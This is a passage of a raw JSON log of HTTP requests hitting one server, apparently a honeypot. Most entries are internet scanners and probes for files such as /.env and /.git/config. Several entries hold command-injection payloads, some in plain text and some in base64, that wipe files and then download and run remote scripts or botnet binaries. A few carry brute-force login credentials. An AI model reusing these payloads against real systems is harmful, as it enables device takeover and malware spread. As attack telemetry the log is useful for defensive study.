"Http_Version": "HTTP/1.1"} +{"ip": "143.198.188.210", "Accept": "*/*", "Host": "localhost:8080", "User_Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.0"} +{"ip": "94.102.61.10", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "185.224.128.184", "Host": "xvideos.com", "Method": "GET", "Path": "/?q=ultrasurf", "Http_Version": "HTTP/1.1"} +{"ip": "180.243.33.193", "Content_Length": "0", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.0"} +{"ip": "198.235.24.123", "Host": "static.148.22.202.116.clients.your-server.de", "User_Agent": "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "67.217.57.54", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept_Encoding": "gzip, deflate", "Accept_Language": "en-GB,en;q=0.5", "Connection": "close", "Host": "116.202.22.148:80", "Upgrade_Insecure_Requests": "1", "User_Agent": "Linux Gnu (cow)", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "185.224.128.199", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Accept_Language": "en US,en;q=0.9,sv;q=0.8", "Connection": "keep-alive", "Content_Type": "application/x-www-form-urlencoded; charset=UTF-8", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46", "X_Requested_With": "XMLHttpRequest", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "45.128.232.125", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "198.199.98.133", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 zgrab/0.x", "Method": "GET", "Path": "/manager/text/list", "Http_Version": "HTTP/1.1"} +{"ip": "94.102.61.45", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "139.162.167.216", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de", "User_Agent": "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)", "Method": "GET", "Path": "/bAiP", "Http_Version": "HTTP/1.1"} +{"ip": "139.162.167.216", "Connection": "close", "Host": "static.148.22.202.116.clients.your-server.de", "User_Agent": "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)", "Method": "GET", "Path": "/Lj5r", "Http_Version": "HTTP/1.1"} +{"ip": "45.81.39.51", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "112.46.68.72", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "130.211.54.158", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "python-requests/2.31.0", "x-datadog-trace-id": "11598323402375006570", "x-datadog-parent-id": "5651318339364036725", "x-datadog-sampling-priority": "0", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "128.14.141.34", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "205.210.31.173", "Accept": "*/*", "User_Agent": "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.0"} +{"ip": "207.90.244.14", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept_Encoding": "identity", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "207.90.244.14", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36", "Method": "GET", "Path": "/favicon.ico", "Http_Version": "HTTP/1.1"} +{"ip": "45.128.232.140", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "84.54.51.12", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "185.224.128.184", "Host": "xvideos.com", "Method": "GET", "Path": "/?q=ultrasurf", "Http_Version": "HTTP/1.1"} +{"ip": "180.149.125.165", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36", "Method": "GET", "Path": "/c/", "Http_Version": "HTTP/1.1"} +{"ip": "162.142.125.11", "Host": "116.202.22.148:8080", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "162.142.125.11", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "162.142.125.11", "Accept_Encoding": "gzip", "Connection": "close", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)", "Method": "GET", "Path": "/favicon.ico", "Http_Version": "HTTP/1.1"} +{"ip": "185.224.128.184", "Host": "xvideos.com", "Method": "GET", "Path": "/?q=ultrasurf", "Http_Version": "HTTP/1.1"} +{"ip": "165.232.177.124", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "195.210.28.127", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36", "Method": "GET", "Path": "/.git/config", "Http_Version": "HTTP/1.1"} +{"ip": "45.128.232.125", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "84.54.51.190", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "207.167.66.222", "Host": "116.202.22.148:80", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "180.180.108.57", "Content_Length": "0", "Host": "116.202.22.148:80", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "84.54.51.111", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept_Encoding": "gzip, deflate", "Accept_Language": "en-GB,en;q=0.5", "Connection": "keep-alive", "Content_Length": "29", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148:80", "Origin": "http://116.202.22.148:80", "Referer": "http://116.202.22.148:80/admin/login.asp", "Upgrade_Insecure_Requests": "1", "User_Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0", "Method": "POST", "Path": "/boaform/admin/formLogin", "Http_Version": "HTTP/1.1", "POST_Payload": "dXNlcm5hbWU9YWRtaW4mcHNkPUZlZWZpZm9mdW0NCg0K"} +{"ip": "193.35.18.33", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "152.32.150.7", "Accept_Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6", "Host": "116.202.22.148", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "152.32.150.7", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11", "Method": "GET", "Path": "/favicon.ico", "Http_Version": "HTTP/1.1"} +{"ip": "152.32.150.7", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11", "Method": "GET", "Path": "/robots.txt", "Http_Version": "HTTP/1.1"} +{"ip": "152.32.150.7", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11", "Method": "GET", "Path": "/sitemap.xml", "Http_Version": "HTTP/1.1"} +{"ip": "152.32.150.7", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Authorization": "NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "python-requests/2.27.1", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "185.236.231.45", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30", "Method": "GET", "Path": "/_profiler/phpinfo", "Http_Version": "HTTP/1.1"} +{"ip": "185.224.128.184", "Host": "xvideos.com", "Method": "GET", "Path": "/?q=ultrasurf", "Http_Version": "HTTP/1.1"} +{"ip": "185.224.128.184", "Host": "xvideos.com", "Method": "GET", "Path": "/?q=ultrasurf", "Http_Version": "HTTP/1.1"} +{"ip": "94.102.61.10", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "45.88.90.129", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept_Encoding": "gzip, deflate", "Accept_Language": "en-GB,en;q=0.5", "Connection": "close", "Host": "116.202.22.148:80", "Referer": "http://116.202.22.148:80/left.html", "Upgrade_Insecure_Requests": "1", "User_Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "198.244.238.99", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36", "Method": "GET", "Path": "/.env", "Http_Version": "HTTP/1.1"} +{"ip": "198.244.238.99", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Content_Length": "20", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36", "Method": "POST", "Path": "/", "Http_Version": "HTTP/1.1", "POST_Payload": "MHglNUIlNUQ9YW5kcm94Z2gwc3Q="} +{"ip": "45.128.232.140", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "185.236.231.45", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36", "Method": "GET", "Path": "/.env", "Http_Version": "HTTP/1.1"} +{"ip": "185.236.231.45", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Content_Length": "20", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36", "Method": "POST", "Path": "/", "Http_Version": "HTTP/1.1", "POST_Payload": "MHglNUIlNUQ9YW5kcm94Z2gwc3Q="} +{"ip": "185.36.81.33", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Accept_Language": "en US,en;q=0.9,sv;q=0.8", "Connection": "keep-alive", "Content_Type": "application/x-www-form-urlencoded; charset=UTF-8", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46", "X_Requested_With": "XMLHttpRequest", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "141.98.10.109", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept_Encoding": "gzip, deflate", "Accept_Language": "en-GB,en;q=0.5", "Authorization": "Basic cm9vdDppY2F0Y2g5OQ==", "Connection": "close", "Host": "116.202.22.148", "Upgrade_Insecure_Requests": "1", "User_Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "141.98.10.109", "Accept_Encoding": "gzip, deflate", "Authorization": "Basic cm9vdDppY2F0Y2g5OQ==", "Content_Length": "332", "Host": "116.202.22.148", "User_Agent": "Abcd", "Method": "POST", "Path": "/dvr/cmd", "Http_Version": "HTTP/1.1", "POST_Payload": "PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48RFZSIFBsYXRmb3JtPSJIaTM1MjAiPjxTZXRDb25maWd1cmF0aW9uIEZpbGU9InNlcnZpY2UueG1sIj48IVtDREFUQVs8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJVVEYtOCI/PjxEVlIgUGxhdGZvcm09IkhpMzUyMCI+PFNlcnZpY2U+PE5UUCBFbmFibGU9IlRydWUiIEludGVydmFsPSIyMDAwMCIgU2VydmVyPSJ0aW1lLm5pc3QuZ292JndnZXQgaHR0cDovLzE0MS45OC4xMC4xMDkvd2dldC5zaCAtTy18c2g7ZWNobyBET05FIi8+PC9TZXJ2aWNlPjwvRFZSPl1dPjwvU2V0Q29uZmlndXJhdGlvbj48L0RWUj4NCg0K"} +{"ip": "141.98.10.109", "Accept_Encoding": "gzip, deflate", "Authorization": "Basic cm9vdDppY2F0Y2g5OQ==", "Content_Length": "332", "Host": "116.202.22.148", "User_Agent": "Abcd", "Method": "POST", "Path": "/cn/cmd", "Http_Version": "HTTP/1.1", "POST_Payload": "PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48RFZSIFBsYXRmb3JtPSJIaTM1MjAiPjxTZXRDb25maWd1cmF0aW9uIEZpbGU9InNlcnZpY2UueG1sIj48IVtDREFUQVs8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJVVEYtOCI/PjxEVlIgUGxhdGZvcm09IkhpMzUyMCI+PFNlcnZpY2U+PE5UUCBFbmFibGU9IlRydWUiIEludGVydmFsPSIyMDAwMCIgU2VydmVyPSJ0aW1lLm5pc3QuZ292JndnZXQgaHR0cDovLzE0MS45OC4xMC4xMDkvd2dldC5zaCAtTy18c2g7ZWNobyBET05FIi8+PC9TZXJ2aWNlPjwvRFZSPl1dPjwvU2V0Q29uZmlndXJhdGlvbj48L0RWUj4NCg0K"} +{"ip": "176.106.150.34", "Content_Length": "0", "Host": "116.202.22.148:80", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "35.187.98.121", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148:8080", "User_Agent": "python-requests/2.31.0", "x-datadog-trace-id": "4481480065664437376", "x-datadog-parent-id": "1266870292655586080", "x-datadog-sampling-priority": "0", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "185.180.143.190", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "167.248.133.190", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "167.248.133.190", "Accept_Encoding": "gzip", "Connection": "close", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)", "Method": "GET", "Path": "/favicon.ico", "Http_Version": "HTTP/1.1"} +{"ip": "162.243.128.49", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 zgrab/0.x", "Method": "GET", "Path": "/ReportServer", "Http_Version": "HTTP/1.1"} +{"ip": "175.197.163.180", "Cookie": "user=admin", "Method": "POST", "Path": "/goform/set_LimitClient_cfg", "Http_Version": "HTTP/1.1", "POST_Payload": "dGltZTE9MDA6MDAtMDA6MDAmdGltZTI9MDA6MDAtMDA6MDAmbWFjPTtybSAtcmYgKmFybSo7IHJtIC1yZiAqYXJtNSo7IHJtIC1yZiAqYXJtNio7IHJtIC1yZiAqYXJtNyo7IHJtIC1yZiAqbTY4ayo7IHJtIC1yZiAqbWlwcyo7IHJtIC1yZiAqbXBzbCo7IHJtIC1yZiAqcHBjKjsgcm0gLXJmICpzaDQqOyBybSAtcmYgKnNwYyo7IHJtIC1yZiAqeDg2Kjsgcm0gLXJmICp4ODZfNjQqO3dnZXQgaHR0cDovLzEwMy42Ny4xOTcuODcvc2t5bGpuZS5tcHNsOyBjaG1vZCA3Nzcgc2t5bGpuZS5tcHNsOyAuL3NreWxqbmUubXBzbCBsYmxpbmsuc2VsZnJlcDsNCg0K"} +{"ip": "180.149.125.163", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36", "Method": "GET", "Path": "/stalker_portal/server/tools/auth_simple.php", "Http_Version": "HTTP/1.1"} +{"ip": "197.52.177.118", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Connection": "keep-alive", "Host": "127.0.0.1:80", "User_Agent": "Hello, world", "Method": "GET", "Path": "/shell?cd+/tmp;rm+-rf+*;wget+45.12.253.180/jaws;sh+/tmp/jaws", "Http_Version": "HTTP/1.1"} +{"ip": "128.1.248.26", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "45.128.232.140", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "85.72.89.21", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "Close", "Cookie": "mac=; stb_lang=en; timezone=Europe%2FAthens;", "Host": "116.202.22.148:80", "Referer": "http://116.202.22.148:80/stalker_portal/c/", "User_Agent": "okhttp/3.12.13", "X-User-Agent": "Model: MAG520; Link: Ethernet", "Method": "GET", "Path": "/stalker_portal/server/load.php?action=handshake&type=stb&sn=&device_id=&device_id2=&JsHttpRequest=1-xml", "Http_Version": "HTTP/1.1"} +{"ip": "95.214.55.115", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept_Encoding": "gzip, deflate", "Accept_Language": "en-GB,en;q=0.5", "Connection": "close", "Host": "116.202.22.148:80", "Upgrade_Insecure_Requests": "1", "User_Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "156.197.11.99", "Cookie": "user=admin", "Method": "POST", "Path": "/goform/set_LimitClient_cfg", "Http_Version": "HTTP/1.1", "POST_Payload": "dGltZTE9MDA6MDAtMDA6MDAmdGltZTI9MDA6MDAtMDA6MDAmbWFjPTt3Z2V0IGh0dHA6Ly85NC4xNTYuNi45Ny9tcHNsOyBjaG1vZCA3NzcgbXBzbDsgLi9tcHNsIGxibGluay5zZWxmcmVwOw0KDQo="} +{"ip": "185.224.128.184", "Host": "xvideos.com", "Method": "GET", "Path": "/?q=ultrasurf", "Http_Version": "HTTP/1.1"} +{"ip": "205.210.31.151", "Accept": "*/*", "User_Agent": "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.0"} +{"ip": "185.224.128.184", "Host": "xvideos.com", "Method": "GET", "Path": "/?q=ultrasurf", "Http_Version": "HTTP/1.1"} +{"ip": "84.54.51.193", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "128.1.248.42", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "85.72.89.21", "Accept": "*/*", "Authorization": "Bearer 00%253A1A%253A79%253A00%253A00%253A00", "Connection": "Keep-Alive", "Cookie": "mac=00%3A1A%3A79%3A00%3A00%3A00; stb_lang=en; timezone=Europe%2FAthens; adid=45b497cff86fb727c38c94078f358070", "Host": "116.202.22.148", "Pragma": "no-cache", "Referer": "http://116.202.22.148:80/stalker_portal/c/", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36", "X-Use-Agent": "Model: MAG322", "Method": "GET", "Path": "/stalker_portal/server/load.php?type=stb&action=get_profile&stb_type=STB&device_id=&device_id2=&auth_second_step=1&metrics=%7B%22mac%22:%2200%3A1A%3A79%3A00%3A00%3A00%22,%22sn%22:%2245B497CFF86FB%22%7D&hw_version_2=45b497cff86fb727c38c94078f358070", "Http_Version": "HTTP/1.1"} +{"ip": "185.100.87.136", "Content_Length": "40", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36", "Method": "POST", "Path": "/index.htm", "Http_Version": "HTTP/1.1", "POST_Payload": "BAaYGQAAAAD/wGgpepDR16ud5KdwJB5Vm7iCiab20+xhTL6Jw/FSuQ=="} +{"ip": "185.100.87.136", "Accept": "*/*", "Cache_Control": "no-cache", "Connection": "Keep-Alive", "Content_Length": "40", "Host": "116.202.22.148", "User_Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)", "Method": "POST", "Path": "/FD873AC4-CF86-4FED-84EC-4BD59C6F17A7", "Http_Version": "HTTP/1.1", "POST_Payload": "niS8o8LWwTK8ipmfMDX/UGPRsZWwO5A3rcsT0TQu40wuiSUS+dG7/Q=="} +{"ip": "118.123.105.92", "Accept": "text/html,application/xhtml+xml,application/xml", "Host": "116.202.22.148", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.0"} +{"ip": "118.123.105.92", "Accept": "text/html,application/xhtml+xml,application/xml", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36", "Method": "GET", "Path": "/favicon.ico", "Http_Version": "HTTP/1.1"} +{"ip": "118.123.105.92", "Accept": "text/html,application/xhtml+xml,application/xml", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36", "Method": "GET", "Path": "/robots.txt", "Http_Version": "HTTP/1.1"} +{"ip": "118.123.105.92", "Accept": "text/html,application/xhtml+xml,application/xml", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36", "Method": "GET", "Path": "/.well-known/security.txt", "Http_Version": "HTTP/1.1"} +{"ip": "141.98.11.52", "Host": "116.202.22.148:80", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "85.72.89.21", "Accept": "*/*", "Authorization": "Bearer 00%253A1A%253A79%253A00%253A00%253A00", "Connection": "Keep-Alive", "Cookie": "mac=00%3A1A%3A79%3A00%3A00%3A00; stb_lang=en; timezone=Europe%2FAthens; adid=45b497cff86fb727c38c94078f358070", "Host": "116.202.22.148", "Pragma": "no-cache", "Referer": "http://116.202.22.148:8080/stalker_portal/c/", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36", "X-Use-Agent": "Model: MAG322", "Method": "GET", "Path": "/stalker_portal/server/load.php?type=stb&action=get_profile&stb_type=STB&device_id=&device_id2=&auth_second_step=1&metrics=%7B%22mac%22:%2200%3A1A%3A79%3A00%3A00%3A00%22,%22sn%22:%2245B497CFF86FB%22%7D&hw_version_2=45b497cff86fb727c38c94078f358070", "Http_Version": "HTTP/1.1"} +{"ip": "193.35.18.33", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "185.180.143.49", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "185.224.128.184", "Host": "xvideos.com", "Method": "GET", "Path": "/?q=ultrasurf", "Http_Version": "HTTP/1.1"} +{"ip": "45.128.232.125", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "185.224.128.184", "Host": "xvideos.com", "Method": "GET", "Path": "/?q=ultrasurf", "Http_Version": "HTTP/1.1"} +{"ip": "198.235.24.46", "Host": "cdn.irserv.sbs", "Method": "GET", "Path": "/", "Http_Version": 